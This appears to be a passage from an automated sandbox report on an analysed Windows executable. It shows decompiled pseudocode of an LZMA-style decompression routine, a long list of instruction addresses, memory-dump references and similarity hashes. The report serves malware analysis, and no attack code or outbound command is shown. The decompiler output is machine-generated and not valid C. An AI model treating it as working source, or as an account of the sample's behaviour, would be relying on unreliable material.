													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x004063d0
0x004063d0
0x004063d4
0x004063f5
0x004063fc
0x00406402
0x00406408
0x0040641a
0x00406420
0x00406425
0x00000000
0x004063d6
0x004063dc
0x0040679d
0x0040679d
0x0040679d
0x004067a0
0x004067a0
0x004067a0
0x004067a6
0x004067ac
0x004067b2
0x004067cc
0x004067cf
0x004067d5
0x004067e0
0x004067e2
0x004067b4
0x004067b4
0x004067c3
0x004067c7
0x004067c7
0x004067ec
0x00000000
0x00000000
0x004067ee
0x004067f2
0x004069a1
0x004069b7
0x004069bf
0x004069c6
0x004069c8
0x004069cf
0x004069d3
0x004069d3
0x004067fe
0x00406805
0x0040680d
0x00406810
0x00406813
0x00406813
0x00406819
0x00406819
0x00405fb5
0x00405fb5
0x00405fb5
0x00405fbe
0x00000000
0x00000000
0x00405fc4
0x00000000
0x00405fcf
0x00000000
0x00000000
0x00405fd8
0x00405fdb
0x00405fde
0x00405fe2
0x00000000
0x00000000
0x00405fe8
0x00405feb
0x00405fed
0x00405fee
0x00405ff1
0x00405ff3
0x00405ff4
0x00405ff6
0x00405ff9
0x00405ffe
0x00406003
0x0040600c
0x0040601f
0x00406022
0x0040602e
0x00406056
0x00406058
0x00406066
0x00406066
0x0040606a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040605a
0x0040605a
0x0040605d
0x0040605e
0x0040605e
0x00000000
0x0040605a
0x00406034
0x00406039
0x00406039
0x00406042
0x0040604a
0x0040604d
0x00000000
0x00406053
0x00406053
0x00000000
0x00406053
0x00000000
0x00406070
0x00406070
0x00406074
0x00406920
0x00000000
0x00406920
0x0040607d
0x0040608d
0x00406090
0x00406093
0x00406093
0x00406093
0x00406096
0x0040609a
0x00000000
0x00000000
0x0040609c
0x004060a2
0x004060cc
0x004060d2
0x004060d9
0x00000000
0x004060d9
0x004060a8
0x004060ab
0x004060b0
0x004060b0
0x004060bb
0x004060c3
0x004060c6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040610b
0x00406111
0x00406114
0x00406121
0x00406129
0x00000000
0x00000000
0x004060e0
0x004060e0
0x004060e4
0x0040692f
0x00000000
0x0040692f
0x004060f0
0x004060fb
0x004060fb
0x004060fb
0x004060fe
0x00406101
0x00406104
0x00406109
0x00000000
0x00000000
0x00000000
0x00000000
0x004067a0
0x004067a0
0x004067a6
0x004067ac
0x004067b2
0x004067cc
0x004067cf
0x004067d5
0x004067e0
0x004067e2
0x004067b4
0x004067b4
0x004067c3
0x004067c7
0x004067c7
0x004067ec
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406131
0x00406133
0x00406136
0x004061a7
0x004061aa
0x004061ad
0x004061b4
0x004061be
0x0040679d
0x0040679d
0x00000000
0x0040679d
0x00406138
0x0040613c
0x0040613f
0x00406141
0x00406144
0x00406147
0x00406149
0x0040614c
0x0040614e
0x00406153
0x00406156
0x00406159
0x0040615d
0x00406164
0x00406167
0x0040616e
0x00406172
0x0040617a
0x0040617a
0x0040617a
0x00406174
0x00406174
0x00406174
0x00406169
0x00406169
0x00406169
0x0040617e
0x00406181
0x0040619f
0x004061a1
0x00000000
0x00406183
0x00406183
0x00406186
0x00406189
0x0040618c
0x0040618e
0x0040618e
0x0040618e
0x00406191
0x00406194
0x00406196
0x00406197
0x0040619a
0x00000000
0x0040619a
0x00000000
0x00000000
0x00000000
0x0040643a
0x0040643e
0x00406461
0x00406464
0x00406467
0x00406471
0x00406440
0x00406440
0x00406443
0x00406446
0x00406449
0x00406456
0x00406459
0x00406459
0x0040679d
0x0040679d
0x0040679d
0x00000000
0x0040679d
0x00000000
0x0040647d
0x00406481
0x00000000
0x00000000
0x00406487
0x0040648b
0x00000000
0x00000000
0x00406491
0x00406493
0x00406497
0x00406497
0x0040649a
0x0040649e
0x00000000
0x00000000
0x004064ee
0x004064f2
0x004064f9
0x004064fc
0x004064ff
0x00406509
0x0040679d
0x0040679d
0x0040679d
0x00000000
0x0040679d
0x0040679d
0x004064f4
0x00000000
0x00000000
0x00406515
0x00406519
0x00406520
0x00406523
0x00406526
0x0040651b
0x0040651b
0x0040651b
0x00406529
0x0040652c
0x0040652f
0x0040652f
0x00406532
0x00406535
0x00406538
0x00406538
0x0040653b
0x00406542
0x00406547
0x00000000
0x00000000
0x004065d5
0x004065d5
0x004065d9
0x00406977
0x00000000
0x00406977
0x004065df
0x004065e2
0x004065e5
0x004065e9
0x004065ec
0x004065f2
0x004065f4
0x004065f4
0x004065f4
0x004065f7
0x004065fa
0x00000000
0x00000000
0x004061ca
0x004061ca
0x004061ce
0x0040693b
0x00000000
0x0040693b
0x004061d4
0x004061d7
0x004061da
0x004061de
0x004061e1
0x004061e7
0x004061e9
0x004061e9
0x004061e9
0x004061ec
0x004061ef
0x004061ef
0x004061f2
0x004061f5
0x00000000
0x00000000
0x004061fb
0x00406201
0x00000000
0x00000000
0x00406207
0x00406207
0x0040620b
0x0040620e
0x00406211
0x00406214
0x00406217
0x00406218
0x0040621b
0x0040621d
0x00406223
0x00406226
0x00406229
0x0040622c
0x0040622f
0x00406232
0x00406235
0x00406251
0x00406254
0x00406257
0x0040625a
0x00406261
0x00406265
0x00406267
0x0040626b
0x00406237
0x00406237
0x0040623b
0x00406243
0x00406248
0x0040624a
0x0040624c
0x0040624c
0x0040626e
0x00406275
0x00406278
0x00000000
0x0040627e
0x00000000
0x0040627e
0x00000000
0x00406283
0x00406283
0x00406287
0x00406947
0x00000000
0x00406947
0x0040628d
0x00406290
0x00406293
0x00406297
0x0040629a
0x004062a0
0x004062a2
0x004062a2
0x004062a2
0x004062a5
0x004062a8
0x004062a8
0x004062a8
0x004062ae
0x00000000
0x00000000
0x004062b0
0x004062b3
0x004062b6
0x004062b9
0x004062bc
0x004062bf
0x004062c2
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062e6
0x004062e9
0x004062ec
0x004062ef
0x004062ef
0x004062f2
0x004062f6
0x004062f8
0x004062d0
0x004062d0
0x004062d8
0x004062dd
0x004062df
0x004062e1
0x004062e1
0x004062fb
0x00406302
0x00406305
0x00000000
0x00406307
0x00000000
0x00406307
0x00406305
0x0040630c
0x0040630c
0x0040630c
0x0040630c
0x00000000
0x00000000
0x00406347
0x00406347
0x0040634b
0x00406953
0x00000000
0x00406953
0x00406351
0x00406354
0x00406357
0x0040635b
0x0040635e
0x00406364
0x00406366
0x00406366
0x00406366
0x00406369
0x0040636c
0x0040636c
0x00406372
0x00406310
0x00406310
0x00406313
0x00000000
0x00406313
0x00406374
0x00406374
0x00406377
0x0040637a
0x0040637d
0x00406380
0x00406383
0x00406386
0x00406389
0x0040638c
0x0040638f
0x00406392
0x004063aa
0x004063ad
0x004063b0
0x004063b3
0x004063b3
0x004063b6
0x004063ba
0x004063bc
0x00406394
0x00406394
0x0040639c
0x004063a1
0x004063a3
0x004063a5
0x004063a5
0x004063bf
0x004063c6
0x004063c9
0x00000000
0x004063cb
0x00000000
0x004063cb
0x00000000
0x00406658
0x00406658
0x0040665c
0x00406983
0x00000000
0x00406983
0x00406662
0x00406665
0x00406668
0x0040666c
0x0040666f
0x00406675
0x00406677
0x00406677
0x00406677
0x0040667a
0x00000000
0x00000000
0x00406428
0x00406428
0x0040642b
0x0040679d
0x0040679d
0x0040679d
0x00000000
0x0040679d
0x00000000
0x00406767
0x0040676b
0x0040678d
0x00406790
0x0040679a
0x0040679d
0x0040679d
0x0040679d
0x00000000
0x0040679d
0x0040679d
0x0040676d
0x00406770
0x00406774
0x00406777
0x00406777
0x0040677a
0x00000000
0x00000000
0x00406824
0x00406828
0x00406846
0x00406846
0x00406846
0x0040684d
0x00406854
0x0040685b
0x0040685b
0x00000000
0x0040685b
0x0040682a
0x0040682d
0x00406830
0x00406833
0x0040683a
0x0040677e
0x0040677e
0x00406781
0x00000000
0x00000000
0x00406915
0x00406918
0x00406819
0x00000000
0x00000000
0x0040654f
0x00406551
0x00406558
0x00406559
0x0040655b
0x0040655e
0x00000000
0x00000000
0x00406566
0x00406569
0x0040656c
0x0040656e
0x00406570
0x00406570
0x00406571
0x00406574
0x0040657b
0x0040657e
0x0040658c
0x00000000
0x00000000
0x00406862
0x00406862
0x00406865
0x0040686c
0x00000000
0x00000000
0x00406871
0x00406871
0x00406875
0x004069ad
0x00000000
0x004069ad
0x0040687b
0x0040687e
0x00406881
0x00406885
0x00406888
0x0040688e
0x00406890
0x00406890
0x00406890
0x00406893
0x00406896
0x00406896
0x00406896
0x00406896
0x00406899
0x00406899
0x0040689d
0x004068fd
0x00406900
0x00406905
0x00406906
0x00406908
0x0040690a
0x0040690d
0x00406819
0x00406819
0x00000000
0x0040681f
0x00406819
0x0040689f
0x004068a5
0x004068a8
0x004068ab
0x004068ae
0x004068b1
0x004068b4
0x004068b7
0x004068ba
0x004068bd
0x004068c0
0x004068d9
0x004068dc
0x004068df
0x004068e2
0x004068e6
0x004068e8
0x004068e8
0x004068e9
0x004068ec
0x004068c2
0x004068c2
0x004068ca
0x004068cf
0x004068d1
0x004068d4
0x004068d4
0x004068ef
0x004068f6
0x00000000
0x004068f8
0x00000000
0x004068f8
0x00000000
0x00406594
0x00406597
0x004065cd
0x004066fd
0x004066fd
0x004066fd
0x004066fd
0x00406700
0x00406700
0x00406703
0x00406705
0x0040698f
0x00000000
0x0040698f
0x0040670b
0x0040670e
0x00000000
0x00000000
0x00406714
0x00406718
0x0040671b
0x0040671b
0x0040671b
0x00000000
0x0040671b
0x00406599
0x0040659b
0x0040659d
0x0040659f
0x004065a2
0x004065a3
0x004065a5
0x004065a7
0x004065aa
0x004065ad
0x004065c3
0x004065c8
0x00406600
0x00406600
0x00406604
0x00406630
0x00406632
0x00406639
0x0040663c
0x0040663f
0x0040663f
0x00406644
0x00406644
0x00406646
0x00406649
0x00406650
0x00406653
0x00406680
0x00406680
0x00406683
0x00406686
0x004066fa
0x004066fa
0x004066fa
0x00000000
0x004066fa
0x00406688
0x0040668e
0x00406691
0x00406694
0x00406697
0x0040669a
0x0040669d
0x004066a0
0x004066a3
0x004066a6
0x004066a9
0x004066c2
0x004066c4
0x004066c7
0x004066c8
0x004066cb
0x004066cd
0x004066d0
0x004066d2
0x004066d4
0x004066d7
0x004066d9
0x004066dc
0x004066e0
0x004066e2
0x004066e2
0x004066e3
0x004066e6
0x004066e9
0x004066ab
0x004066ab
0x004066b3
0x004066b8
0x004066ba
0x004066bd
0x004066bd
0x004066ec
0x004066f3
0x0040667d
0x0040667d
0x0040667d
0x0040667d
0x00000000
0x004066f5
0x00000000
0x004066f5
0x004066f3
0x00406606
0x00406609
0x0040660b
0x0040660e
0x00406611
0x00406614
0x00406616
0x00406619
0x0040661c
0x0040661c
0x0040661f
0x0040661f
0x00406622
0x00406629
0x004065fd
0x004065fd
0x004065fd
0x004065fd
0x00000000
0x0040662b
0x00000000
0x0040662b
0x00406629
0x004065af
0x004065b2
0x004065b4
0x004065b7
0x00000000
0x00000000
0x00406316
0x00406316
0x0040631a
0x0040695f
0x00000000
0x0040695f
0x00406320
0x00406323
0x00406326
0x00406329
0x0040632c
0x0040632f
0x00406332
0x00406334
0x00406337
0x0040633a
0x0040633d
0x0040633f
0x0040633f
0x0040633f
0x00000000
0x00000000
0x004064a1
0x004064a1
0x004064a5
0x0040696b
0x00000000
0x0040696b
0x004064ab
0x004064ae
0x004064b1
0x004064b4
0x004064b6
0x004064b6
0x004064b6
0x004064b9
0x004064bc
0x004064bf
0x004064c2
0x004064c5
0x004064c8
0x004064c9
0x004064cb
0x004064cb
0x004064cb
0x004064ce
0x004064d1
0x004064d4
0x004064d7
0x004064d7
0x004064d7
0x004064da
0x004064dc
0x004064dc
0x00000000
0x00000000
0x0040671e
0x0040671e
0x0040671e
0x00406722
0x00000000
0x00000000
0x00406728
0x0040672b
0x0040672e
0x00406731
0x00406733
0x00406733
0x00406733
0x00406736
0x00406739
0x0040673c
0x0040673f
0x00406742
0x00406745
0x00406746
0x00406748
0x00406748
0x00406748
0x0040674b
0x0040674e
0x00406751
0x00406754
0x00406757
0x0040675b
0x0040675d
0x00406760
0x00000000
0x00406762
0x004064df
0x004064df
0x00000000
0x004064df
0x00406760
0x00406995
0x00000000
0x00000000
0x00405fc4
0x004069cc
0x004069cc
0x00000000
0x004069cc
0x00406819
0x004067a0
0x0040679d
0x00000000
0x004063d4

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 040a7e0d789931a885e98904e34fb369bef72c7c312577bd0d6f252efd828c84
Instruction ID: 235c9a1f152390887c8e3346b3cf8cf745e7d176c25095dba4735a56a8f4339d
Opcode Fuzzy Hash: 040a7e0d789931a885e98904e34fb369bef72c7c312577bd0d6f252efd828c84
Instruction Fuzzy Hash: 80714371D00229CBDF28CFA8C8447ADBBF1FB48305F15806AD846BB281D7395A96DF54

Uniqueness

Uniqueness Score: -1.00%

Function 004064EE, Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E004064EE() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
